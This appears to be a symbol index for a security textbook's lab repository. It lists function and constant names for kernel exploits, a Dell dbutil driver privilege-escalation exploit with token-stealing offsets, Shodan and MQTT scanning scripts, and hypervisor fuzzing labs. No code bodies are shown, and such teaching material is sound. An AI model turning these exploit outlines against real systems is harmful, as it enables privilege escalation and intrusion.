FILE: ch12/shared/exploit4/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function main (line 34) | int main() {
FILE: ch12/shared/exploit5/exploit.c
function save_state (line 10) | void save_state(){
function shell (line 22) | void shell(void){
function main (line 34) | int main() {
FILE: ch12/shared/leak.c
function main (line 7) | int main() {
FILE: ch14/dbutil_exploit.c
type DbMemcpy (line 8) | struct DbMemcpy {
function BOOL (line 16) | BOOL read(HANDLE hdev, ULONG_PTR ptr, DWORD size, LPVOID out) {
function BOOL (line 38) | BOOL write(HANDLE hdev, ULONG_PTR ptr, BYTE* content, DWORD size) {
function BOOL (line 58) | BOOL read_ptr(HANDLE hdev, ULONG_PTR src, ULONG_PTR* out) {
function BOOL (line 62) | BOOL write_ptr(HANDLE hdev, ULONG_PTR dst, ULONG_PTR val) {
function LPVOID (line 66) | LPVOID get_kernel_base() {
function main (line 88) | int main(int argc, char** argv) {
FILE: ch14/dbutil_exploit.py
function errcheck_bool (line 21) | def errcheck_bool(res, func, args):
function errcheck_drivername (line 27) | def errcheck_drivername(res, func, args):
function errcheck_createfile (line 37) | def errcheck_createfile(res, func, args):
function GetProcAddressAbsolute (line 100) | def GetProcAddressAbsolute(hmodule, realbase, symbol):
class DbMemcpy (line 105) | class DbMemcpy(LittleEndianStructure):
function _read (line 111) | def _read(hdev, ptr, size):
function _write (line 123) | def _write(hdev, ptr, contents):
function get_driver_bases (line 129) | def get_driver_bases():
FILE: ch14/dbutil_exploit/src/bin/exploit.rs
constant PID_OFFSET (line 4) | const PID_OFFSET: usize = 0x440;
constant APLINKS_OFFSET (line 5) | const APLINKS_OFFSET: usize = 0x448;
constant TOKEN_OFFSET (line 6) | const TOKEN_OFFSET: usize = 0x4B8;
function main (line 8) | fn main() {
FILE: ch14/dbutil_exploit/src/bin/ioctlcall.rs
function main (line 3) | fn main() {
FILE: ch14/dbutil_exploit/src/lib.rs
type DbMemmove (line 7) | struct DbMemmove {
function open_dev (line 15) | pub unsafe fn open_dev() -> HANDLE {
function ioctl (line 27) | pub unsafe fn ioctl(dev: HANDLE, num: u32, iobuf: PVOID, buflen: usize) ...
function read_ptr (line 40) | pub fn read_ptr(hdev: HANDLE, ptr: usize) -> usize {
function write_ptr (line 54) | pub fn write_ptr(hdev: HANDLE, ptr: usize, content: usize) {
function get_kernel_base (line 67) | pub unsafe fn get_kernel_base() -> usize {
FILE: ch14/ioctlcall.py
function errcheck_bool (line 9) | def errcheck_bool(res, func, args):
function errcheck_createfile (line 15) | def errcheck_createfile(res, func, args):
function opendevice (line 48) | def opendevice(dev):
function ioctl (line 56) | def ioctl(hdev, ioctl, input, outbuf_len):
function _buf_or_stdin (line 69) | def _buf_or_stdin(arg):
FILE: ch19/lab-19-2/facet-search.py
function shodan_search (line 4) | def shodan_search():
FILE: ch19/lab-19-2/mqtt-search.py
function shodan_search (line 3) | def shodan_search():
FILE: ch19/lab-19-3/mqtt-scan.py
function on_connect (line 3) | def on_connect(client, userdata, flags, rc):
function on_message (line 7) | def on_message(client, userdata, msg):
FILE: ch22/Analyze/decode-inspectrum.py
function decode (line 6) | def decode(pfx,thresh,symbols):
FILE: ch24/labs/lab1/common.c
function outb (line 9) | static void outb(uint16_t port, uint8_t val) {
function inb (line 13) | static uint8_t inb(uint16_t port) {
function setup_serial (line 19) | void setup_serial() {
function write_serial (line 29) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 39) | void read_serial(void *data, unsigned long len) {
FILE: ch24/labs/lab1/main.c
function kmain (line 7) | void kmain() {
FILE: ch24/labs/lab2/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab2/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab2/main.c
function kmain (line 8) | void kmain() {
FILE: ch24/labs/lab2/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab2/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab3/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab3/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab3/guest.py
class Guest (line 7) | class Guest:
method __init__ (line 8) | def __init__(self):
method __enter__ (line 11) | def __enter__(self):
method __exit__ (line 18) | def __exit__(self, type, value, traceback):
method messages (line 21) | def messages(self):
FILE: ch24/labs/lab3/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab3/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab3/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab3/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab3/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab4/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab4/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab4/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab4/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 28) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 31) | def _init_boot_info(self, symbols, mmap):
method messages (line 42) | def messages(self):
method op_write (line 52) | def op_write(self, code, address=None):
method op_exec (line 63) | def op_exec(self, address):
method op_commit (line 69) | def op_commit(self):
method execute (line 73) | def execute(self, code):
FILE: ch24/labs/lab4/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab4/main.py
class OOBType (line 9) | class OOBType(Enum):
FILE: ch24/labs/lab4/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab4/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab4/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab4/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab4/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch24/labs/lab5/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab5/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab5/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab5/fuzzer.py
class OOBType (line 11) | class OOBType(Enum):
class Fuzzer (line 15) | class Fuzzer:
method __init__ (line 20) | def __init__(self, seed):
method timeout_handler (line 25) | def timeout_handler(signum, frame):
method context_save (line 28) | def context_save(self):
method context_restore (line 33) | def context_restore(self):
method code (line 38) | def code(self, code):
method fuzz (line 41) | def fuzz(self, reply):
method on_boot (line 44) | def on_boot(self, body):
method handle_message (line 47) | def handle_message(self, msg_type, body):
method run (line 65) | def run(self):
FILE: ch24/labs/lab5/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 27) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 30) | def _init_boot_info(self, symbols, mmap):
method messages (line 41) | def messages(self):
method op_write (line 51) | def op_write(self, code, address=None):
method op_exec (line 62) | def op_exec(self, address):
method op_commit (line 68) | def op_commit(self):
method execute (line 72) | def execute(self, code):
FILE: ch24/labs/lab5/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab5/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch24/labs/lab5/port_fuzzer.py
class Fuzzer (line 8) | class Fuzzer(fuzzer.Fuzzer):
method __init__ (line 9) | def __init__(self, seed):
method fuzz (line 14) | def fuzz(self, reply):
FILE: ch24/labs/lab5/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch24/labs/lab5/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch24/labs/lab5/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch24/labs/lab5/remotemem.py
class RemoteMemoryError (line 6) | class RemoteMemoryError(Exception):
class RemoteMemory (line 9) | class RemoteMemory:
method __init__ (line 10) | def __init__(self):
method add_region (line 14) | def add_region(self, base, size):
method del_region (line 19) | def del_region(self, base, size):
method alloc (line 24) | def alloc(self, size):
method free (line 33) | def free(self, address):
FILE: ch24/labs/lab6/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch24/labs/lab6/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch24/labs/lab6/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch24/labs/lab6/fuzzer.py
class OOBType (line 11) | class OOBType(Enum):
class Fuzzer (line 15) | class Fuzzer:
method __init__ (line 20) | def __init__(self, seed):
method timeout_handler (line 25) | def timeout_handler(signum, frame):
method context_save (line 28) | def context_save(self):
method context_restore (line 33) | def context_restore(self):
method code (line 38) | def code(self, code):
method fuzz (line 41) | def fuzz(self, reply):
method on_boot (line 44) | def on_boot(self, body):
method handle_message (line 47) | def handle_message(self, msg_type, body):
method run (line 65) | def run(self):
FILE: ch24/labs/lab6/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 14) | def __init__(self):
method __enter__ (line 20) | def __enter__(self):
method __exit__ (line 27) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 30) | def _init_boot_info(self, symbols, mmap):
method messages (line 41) | def messages(self):
method op_write (line 51) | def op_write(self, code, address=None):
method op_exec (line 62) | def op_exec(self, address):
method op_commit (line 68) | def op_commit(self):
method execute (line 72) | def execute(self, code):
FILE: ch24/labs/lab6/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 20) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 35) | static void put_mbi(const void *mbi) {
function op_write (line 56) | static void op_write() {
function op_exec (line 67) | static void op_exec() {
function kmain (line 73) | void kmain(const void *mbi) {
FILE: ch24/labs/lab6/msr_fuzzer.py
function ROR (line 57) | def ROR(x, n, bits):
class Fuzzer (line 60) | class Fuzzer(fuzzer.Fuzzer):
method __init__ (line 61) | def __init__(self, seed):
method flip_bits (line 65) | def flip_bits(self, data, bits):
method fuzz (line 70) | def fuzz(self, reply):
FILE: ch24/labs/lab6/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
